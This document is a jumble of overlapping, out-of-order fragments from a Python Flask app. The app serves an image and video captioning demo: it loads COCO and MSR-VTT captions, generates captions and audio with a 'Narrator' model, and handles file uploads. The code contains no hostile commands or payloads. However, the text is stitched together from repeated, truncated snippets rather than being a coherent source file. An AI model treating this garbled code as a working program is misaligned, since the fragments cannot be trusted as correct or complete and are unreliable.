"gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x:",
"narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption in enumerate(captions):",
"redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True,",
"to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path",
"'_'.join(filename) # Replace existing . with _ return filename, ext def determine_type(ext, by_scene):",
"samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'],",
"+ '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ))",
"'.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene'))",
"app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator",
"narrator.coco_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt = gt gt",
"by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions })",
"@app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact')",
"if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video' return 'image' def",
"if by_scene: return 'scene' return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption",
"= request.files['file'] by_scene = 'by_scene' in request.form # Check if filetype is allowed",
"using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda x: narrator.msrvtt_vocab.encode( x,",
"for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x for x",
"app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids if x not in",
"video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] +",
"filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if ext in",
"and generated caption url = app.config['MSRVTT_DATA_PATH'] + vid_id + '.mp4' caption = narrator.gen_caption(url,",
"if file and allowed_file(file.filename): # Fix filename, save to file, get ext and",
"for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample",
"for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i) +",
"rand_vid_ids = [x for x in rand_vid_ids if x not in samplesDF['id'].values.tolist()][ :len(vid_names)]",
"@app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output page.\"\"\" #",
"Generate audio files for each caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption,",
"each caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' +",
"return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename = file.filename.replace('",
"scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF =",
"+ '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) +",
"beam_size=8) # Get all gt captions and encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id']",
"+ '.ogg', 'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene',",
"\"\"\"Get path to file in upload directory.\"\"\" return send_from_directory(app.config['UPLOAD_DIR'], filename) @app.route('/samples/<filename>') def get_sample(filename):",
"in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids = msrvttCaptionDF[msrvttCaptionDF['set'] == 'test'].sample(n=32)[",
"coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode using",
"rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids",
"import PIL from flask import render_template, request, redirect, url_for, send_from_directory, session from app",
"imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio files",
"samplesDF.loc[name, 'gt'] = gt print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)):",
"str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image'",
"'gt': vid_sample['gt'], 'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' +",
"+ '.mp4', by_scene=True, as_string=True) # Create dataframe sceneSamplesDF = pd.DataFrame({ 'time': scene_change_timecodes, 'caption':",
"app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') #",
"'gt_audio': 'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) +",
"def videos(): \"\"\"Render video examples page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def",
"+ '.ogg') # update samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] =",
"COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH'])",
"'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids if x not in samplesDF['id'].values.tolist()][",
"filetype is allowed if file and allowed_file(file.filename): # Fix filename, save to file,",
"import pandas as pd import skimage.io as io import PIL from flask import",
"= pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF = pd.DataFrame( columns=['id', 'caption', 'gt'],",
"narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR']",
"return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about',",
"in x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x]",
"PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name + '.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR']",
"+ 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find the nearest gt",
"as_string=True, by_scene=by_scene) scenes_dict = [] for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] +",
"app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] +",
"and reject any that already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] ==",
"str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix)",
"extension.\"\"\" return '.' in filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file):",
"any that already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist()",
"+ '.' + str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv',",
"filename and \\ filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and",
"caption = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg' narrator.gen_audio_file(",
"above -- allows if request.method == 'POST': try: # Grab file, and if",
"demo output page.\"\"\" # Duplicate of above -- allows if request.method == 'POST':",
"return 'scene' return 'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given",
"narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find",
"if it doesn't already exist if not os.path.exists(scene_example_file + '.csv'): # Generate captions",
"def demo(): \"\"\"Render demo page.\"\"\" # Check if file is uploaded if request.method",
"root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'], msrvtt_vocab_path=app.config['MSRVTT_VOCAB_PATH'], base_model=app.config['ENCODER_MODEL'], ic_model_path=app.config['IC_MODEL_PATH'], vc_model_path=app.config['VC_MODEL_PATH'], ic_rnn_type=app.config['IC_RNN_TYPE'], vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from",
"bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() #",
"@app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images():",
"'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples loaded\") # Get",
"uploaded if request.method == 'POST': try: # Grab file, and if by_scene is",
"= save_file(file) filename, ext = split_filename(file) typ = determine_type(ext, by_scene) if typ ==",
"as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def",
"= pd.DataFrame({ 'time': scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda",
"filename) @app.route('/samples/<filename>') def get_sample(filename): \"\"\"Get path to file in samples directory.\"\"\" return send_from_directory(app.config['SAMPLES_DIR'],",
"+ str(i) + '.ogg') # Save samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) #",
"update im_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names",
"file is uploaded if request.method == 'POST': try: # Grab file, and if",
"example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it",
"caption/audio and redirect to demo_output page if not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config[",
"4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video'",
"'_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def",
"to samples directory shutil.copy(url, app.config['SAMPLES_DIR'] + name + '.mp4') # Generate audio files",
"# Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file( caption,",
"url = coco.loadImgs(im_id)[0]['coco_url'] caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and",
"file for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and generated",
"= gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x,",
"all gt captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts",
"'.jpg') # Generate audio files narrator.gen_audio_file( gt, app.config['SAMPLES_DIR'] + name + '_gt.ogg') narrator.gen_audio_file(",
"samplesDF.to_csv(app.config['SAMPLES_DIR'] + 'sample_captions.csv') # Load samples IM_SAMPLES_DICT = [[], [], [], []] VID_SAMPLES_DICT",
"best_score = bleu nearest_gt = gt gt = ' '.join(nearest_gt).capitalize() caption = '",
"str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg' }) print(\"Samples",
"@app.route('/images') def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos')",
"render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html',",
"if 'video' in x] # Randomly select ids from their respective datasets and",
"caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode using vocabulary",
"samples dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] =",
"+ '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode",
"split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename,",
"[x for x in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x for",
"doesn't already exist if not os.path.exists(scene_example_file + '.csv'): # Generate captions by scene",
"for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and generated caption",
"vid_id + '.mp4' caption = narrator.gen_caption(url, beam_size=8) # Get all gt captions and",
"caption for i, caption in enumerate(captions): narrator.gen_audio_file( caption, scene_example_file + '.' + str(i)",
"'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check if file is uploaded if",
"page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT,",
"+ str(ix)] IM_SAMPLES_DICT[int(i / 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg',",
"[] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.'",
"me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE']) @app.route('/about') def about(): \"\"\"Render about page.\"\"\" return",
"page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact',",
"@app.route('/about') def about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST'])",
"from app import app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from",
"is allowed if file and allowed_file(file.filename): # Fix filename, save to file, get",
"im_sample['gt'], 'gt_audio': 'image' + str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix)",
"= [[], [], [], []] VID_SAMPLES_DICT = [[], [], [], []] for i,",
"SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE']",
"'caption': caption.capitalize() }) session['scenes_dict'] = scenes_dict return redirect(url_for('uploaded_file', filename=file.filename, typ='scene', caption='scene', cap_audio='scene')) except",
"example SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time': row['time'], 'cap_audio':",
"'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio': 'image' +",
"website file = request.files['file'] by_scene = 'by_scene' in request.form # Check if filetype",
"x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt = '' best_score = 0.0",
"enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)] IM_SAMPLES_DICT[int(i /",
"page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None): \"\"\"Render demo output",
"Load scene example SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({ 'time':",
"str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' }) VID_SAMPLES_DICT[int(i",
"def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main', title=app.config['TITLE']) @app.route('/images') def images(): \"\"\"Render image",
"for i, (name, im_id) in enumerate(zip(im_names, rand_im_ids)): # Get image and generated caption",
"Randomly select ids from their respective datasets and reject any that already have",
"file.filename = file.filename.replace(' ', '_') file_path = save_file(file) filename, ext = split_filename(file) typ",
"'.ogg' }) VID_SAMPLES_DICT[int(i / 4)].append({ 'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4',",
"'video' + str(ix) + '_gt.ogg', 'caption': vid_sample['caption'], 'cap_audio': 'video' + str(ix) + '.ogg'",
"# chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x",
"# Determine images and videos to update im_names = [x for x in",
"gts.apply(lambda x: narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True))",
"the nearest gt nearest_gt = '' best_score = 0.0 for gt in gts:",
"return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if ext",
"import render_template, request, redirect, url_for, send_from_directory, session from app import app sys.path.append(app.config['COCOAPI_PATH'] +",
"e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\",",
"datasets and reject any that already have been # chosen rand_im_ids = cocoCaptionDF[cocoCaptionDF['set']",
"def split_filename(file): \"\"\"Split filename into name and ext.\"\"\" *filename, ext = file.filename.split('.') if",
"and video datasets coco = COCO(app.config[ 'COCOAPI_PATH'] + 'annotations/instances_{}.json'.format(app.config['COCO_SET'])) cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH']",
"'video' return 'image' def generate_caption(file, by_scene): \"\"\"Generate caption for given file\"\"\" file.filename =",
"+ str(ix) + '_gt.ogg', 'caption': im_sample['caption'], 'cap_audio': 'image' + str(ix) + '.ogg' })",
"' '.join(caption).capitalize() # Load and save imge im = PIL.Image.fromarray(io.imread(url)).convert('RGB') im.save(app.config['SAMPLES_DIR'] + name",
"list): filename = '_'.join(filename) # Replace existing . with _ return filename, ext",
"ext def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']:",
"of above -- allows if request.method == 'POST': try: # Grab file, and",
"'.ogg' narrator.gen_audio_file( caption, app.config['UPLOAD_DIR'] + cap_audio) return redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) #",
"[]] for i, ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample =",
"cocoCaptionDF[cocoCaptionDF['set'] == app.config[ 'COCO_SET']].sample(n=32)['id'].values.tolist() rand_im_ids = [x for x in rand_im_ids if x",
"app sys.path.append(app.config['COCOAPI_PATH'] + 'PythonAPI') from pycocotools.coco import COCO sys.path.append('../src/') from Narrator import Narrator",
"KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>')",
"print(\"Samples loaded\") # Get filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] +",
"scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me page.\"\"\" return render_template('contact.html', page='contact', title=app.config['TITLE'])",
"vc_rnn_type=app.config['VC_RNN_TYPE'] ) # Load samples from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] +",
"cocoCaptionDF = pd.read_csv( app.config['COCOAPI_PATH'] + 'annotations/coco_captions.csv') msrvttCaptionDF = pd.read_csv(app.config['MSRVTT_CAPTION_PATH']) # Determine images and",
"narrator.msrvtt_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.msrvtt_vocab.decode(x, clean=True)) # Find",
"samples dataframe sceneSamplesDF.to_csv(scene_example_file + '.csv', index=False) # Load samples dataframe else: sceneSamplesDF =",
"not by_scene: caption = narrator.gen_caption(file_path, beam_size=app.config['BEAM_SIZE'], as_string=True, by_scene=by_scene).capitalize() cap_audio = filename + '.ogg'",
"Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) # Generate audio files for each",
"pandas as pd import skimage.io as io import PIL from flask import render_template,",
"[x for x in rand_im_ids if x not in samplesDF['id'].values.tolist()][ :len(im_names)] rand_vid_ids =",
"samples dataframe samplesDF.loc[name, 'id'] = im_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] =",
"# Duplicate of above -- allows if request.method == 'POST': try: # Grab",
"determine_type(ext, by_scene) if typ == 'image': by_scene = False # Generate caption/audio and",
"allows if request.method == 'POST': try: # Grab file, and if by_scene is",
"'_gt.ogg') narrator.gen_audio_file( caption, app.config['SAMPLES_DIR'] + name + '.ogg') # update samples dataframe samplesDF.loc[name,",
"= gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) # Find nearest gt nearest_gt = '' best_score",
"for i, caption in enumerate(captions): narrator.gen_audio_file(caption, app.config['UPLOAD_DIR'] + filename + '.' + str(i)",
"# Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene",
"print('Images updated!') for i, (name, vid_id) in enumerate(zip(vid_names, rand_vid_ids)): # Get video and",
"Generate caption/audio by scene and redirect to demo_output # page captions, time_codes =",
"return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\" return",
"Find nearest gt nearest_gt = '' best_score = 0.0 for gt in gts:",
"time_codes[i], 'cap_audio': filename + '.' + str(i) + '.ogg', 'caption': caption.capitalize() }) session['scenes_dict']",
"@app.route('/demo', methods=['GET', 'POST']) def demo(): \"\"\"Render demo page.\"\"\" # Check if file is",
"# Grab file, and if by_scene is requested from website file = request.files['file']",
"= narrator.gen_caption(url, beam_size=8) # Get all gt captions and encode/decode using vocabulary gts",
"page.\"\"\" return render_template('videos.html', vid_dict=VID_SAMPLES_DICT, page='videos', title=app.config['TITLE']) @app.route('/scenes') def scenes(): \"\"\"Render scene examples page.\"\"\"",
"print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST']) def uploaded_file(filename, typ='image', caption=\"\", cap_audio=None):",
"filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS'] def save_file(file): \"\"\"Save given file and return path.\"\"\" file_path",
"# Get filepath for scene example scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] #",
"'POST': try: # Grab file, and if by_scene is requested from website file",
"Generate captions by scene captions, scene_change_timecodes = narrator.gen_caption( scene_example_file + '.mp4', by_scene=True, as_string=True)",
"'.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image to samples directory shutil.copy(url, app.config['SAMPLES_DIR']",
"# Check if filetype is allowed if file and allowed_file(file.filename): # Fix filename,",
"gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Copy image to",
"scene examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact",
"dataframe samplesDF.loc[name, 'id'] = vid_id samplesDF.loc[name, 'caption'] = caption samplesDF.loc[name, 'gt'] = gt",
"row['time'], 'cap_audio': app.config['SCENE_EXAMPLE_FILE'] + '.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ##############################################################################",
"image or video.\"\"\" if ext in app.config['VID_EXTENSIONS']: if by_scene: return 'scene' return 'video'",
"examples page.\"\"\" return render_template('scenes.html', page='scenes', scenes_dict=SCENE_SAMPLES_DICT, title=app.config['TITLE']) @app.route('/contact') def contact(): \"\"\"Render contact me",
"by scene and redirect to demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[",
"= file.filename.replace(' ', '_') @app.route('/') @app.route('/index') def index(): \"\"\"Render homepage.\"\"\" return render_template('main.html', page='main',",
"/ 4)].append({ 'id': im_sample['id'], 'url': 'image' + str(ix) + '.jpg', 'gt': im_sample['gt'], 'gt_audio':",
"from file try: samplesDF = pd.read_csv( app.config['SAMPLES_DIR'] + 'sample_captions.csv', index_col=0) except: samplesDF =",
"about(): \"\"\"Render about page.\"\"\" return render_template('about.html', page='about', title=app.config['TITLE']) @app.route('/demo', methods=['GET', 'POST']) def demo():",
"if typ == 'image': by_scene = False # Generate caption/audio and redirect to",
"and redirect to demo_output # page captions, time_codes = narrator.gen_caption(file_path, beam_size=app.config[ 'BEAM_SIZE'], as_string=True,",
"# Load scene example SCENE_SAMPLES_DICT = [] for i, row in sceneSamplesDF.iterrows(): SCENE_SAMPLES_DICT.append({",
"x: narrator.coco_vocab.encode( x, app.config['MAX_LEN'] + 1)) gts = gts.apply(lambda x: narrator.coco_vocab.decode(x, clean=True)) #",
"render_template('demo_output.html', filename=filename, typ=typ, caption=caption, cap_audio=cap_audio, page='demo', title=app.config['TITLE']) @app.route('/uploads/<filename>') def get_upload(filename): \"\"\"Get path to",
"save to file, get ext and determine type file.filename = file.filename.replace(' ', '_')",
"narrator.msrvtt_vocab.evaluate([gt], caption) if bleu > best_score: best_score = bleu nearest_gt = gt gt",
"import skimage.io as io import PIL from flask import render_template, request, redirect, url_for,",
"by_scene = 'by_scene' in request.form # Check if filetype is allowed if file",
"in app.config['SAMPLES_TO_UPDATE'] if 'image' in x] vid_names = [x for x in app.config['SAMPLES_TO_UPDATE']",
"ix in enumerate(range(16)): im_sample = samplesDF.loc['image' + str(ix)] vid_sample = samplesDF.loc['video' + str(ix)]",
"if x not in samplesDF['id'].values.tolist()][ :len(vid_names)] # Generate sample information and store to",
"cap_audio='scene')) except KeyError as e: print(e) return render_template('demo.html', page='demo', title=app.config['TITLE']) @app.route('/demo/<filename>&<cap_audio>&<typ>&<caption>', methods=['GET', 'POST'])",
"ids from their respective datasets and reject any that already have been #",
"if bleu > best_score: best_score = bleu nearest_gt = gt gt = '",
"def images(): \"\"\"Render image examples page.\"\"\" return render_template('images.html', im_dict=IM_SAMPLES_DICT, page='images', title=app.config['TITLE']) @app.route('/videos') def",
"filename into name and ext.\"\"\" *filename, ext = file.filename.split('.') if isinstance(filename, list): filename",
"any existing samples if len(app.config['SAMPLES_TO_UPDATE']) > 0: # Load image and video datasets",
"'id': vid_sample['id'], 'url': 'video' + str(ix) + '.mp4', 'gt': vid_sample['gt'], 'gt_audio': 'video' +",
"captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts = gts.apply(lambda",
"sys.path.append('../src/') from Narrator import Narrator # Construct classes narrator = Narrator( root_path=app.config['ROOT_PATH'], coco_vocab_path=app.config['COCO_VOCAB_PATH'],",
"vid_names = [x for x in app.config['SAMPLES_TO_UPDATE'] if 'video' in x] # Randomly",
"by_scene is requested from website file = request.files['file'] by_scene = 'by_scene' in request.form",
"encode/decode using vocabulary gts = cocoCaptionDF[cocoCaptionDF['id'] == im_id]['caption'] gts = gts.apply(lambda x: narrator.coco_vocab.encode(",
"Load samples dataframe else: sceneSamplesDF = pd.read_csv(scene_example_file + '.csv') # Load scene example",
"with _ return filename, ext def determine_type(ext, by_scene): \"\"\"Determine if image or video.\"\"\"",
"scene_example_file = app.config[ 'SAMPLES_DIR'] + app.config['SCENE_EXAMPLE_FILE'] # Create scene example if it doesn't",
"\"\"\" import os import sys import shutil import pandas as pd import skimage.io",
"redirect(url_for('uploaded_file', filename=file.filename, cap_audio=cap_audio, caption=caption, typ=typ)) # Generate caption/audio by scene and redirect to",
"'.' + str(i) + '.ogg', 'caption': row['caption'].capitalize() }) ############################################################################## ##################################### APP #################################### ##############################################################################",
"scene_change_timecodes, 'caption': captions }) # Capitalize sceneSamplesDF['caption'] = sceneSamplesDF[ 'caption'].apply(lambda x: x.capitalize()) #",
"str(i) + '.ogg') scenes_dict.append({ 'time': time_codes[i], 'cap_audio': filename + '.' + str(i) +",
"= gt gt = ' '.join(nearest_gt).capitalize() caption = ' '.join(caption).capitalize() # Load and",
"typ='scene', caption='scene', cap_audio='scene')) except KeyError as e: print(e) return render_template('demo_output.html', filename=filename, typ=typ, caption=caption,",
"gt captions and encode/decode using vocabulary gts = msrvttCaptionDF[msrvttCaptionDF['vid_id'] == vid_id]['caption'] gts =",
